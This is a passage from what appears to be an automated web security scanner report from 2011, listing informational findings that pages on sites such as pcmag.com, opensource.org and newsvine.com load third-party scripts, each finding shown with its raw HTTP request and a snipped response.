<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.530. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:00:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5tn15kgku9ganumk32p2galds1; expires=Tue, 22-Feb-2011 05:34:18 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 30 Jan 2011 01:50:28 GMT
ETag: "cccc2ce42797085e2ccf82df13a9cd5b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

23.531. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:55 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6th723c18tdksfb5ri6bpq7kv1; expires=Tue, 22-Feb-2011 02:57:15 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 29 Jan 2011 23:16:07 GMT
ETag: "1126140718825d2e8a4072da2e624330"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

23.532. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outblush.com
Path:   /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11007
Date: Sun, 30 Jan 2011 02:01:00 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://outblushcom.skimlinks.com/api/skimlinks.js"></script>
...[SNIP]...

23.533. http://www.outofthecradle.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outofthecradle.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.outofthecradle.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:15:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.outofthecradle.net/WordPress/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 185940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>    <meta name="verify-v1" conten
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<CENTER>
<script type="text/javascript" src="http://ja.revolvermaps.com/m.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</body>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
<!-- 103bees.com 'bee' code v1.11 - please do not make any changes! -->
<script type="text/javascript" src="http://103bees.com/bees/?bee=2441&amp;fid=3107"></script>
...[SNIP]...

23.534. http://www.pcmag.com/&|http:/www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /&|http:/www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /&|http:/www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 130460
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 30 Jan 2011 02:00:56 GMT
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-Powered-By: ASP.NET
Expires: Sun, 30 Jan 2011 02:01:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 02:01:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- BEGIN AdChoice Script -->
<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

23.535. http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: private, max-age=2997
Date: Sun, 30 Jan 2011 02:01:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- BEGIN AdChoice Script -->
<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

23.536. http://www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: private, max-age=3135
Date: Sun, 30 Jan 2011 02:01:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- BEGIN AdChoice Script -->
<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

23.537. http://www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 30 Jan 2011 01:53:02 GMT
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-Powered-By: ASP.NET
Cache-Control: public, max-age=0
Expires: Sun, 30 Jan 2011 02:01:16 GMT
Date: Sun, 30 Jan 2011 02:01:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- BEGIN AdChoice Script -->
<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

23.538. http://www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: private, max-age=3012
Date: Sun, 30 Jan 2011 02:01:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- BEGIN AdChoice Script -->
<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

23.539. http://www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 130460
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Expires: Sun, 30 Jan 2011 02:01:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 02:01:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--marketplace-->
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- BEGIN AdChoice Script -->
<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

23.540. http://www.polls.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.541. http://www.polls.newsvine.com/_labs/archive

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_labs/archive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_labs/archive HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 628172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.542. http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/backyard/greenhouse

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/backyard/greenhouse HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
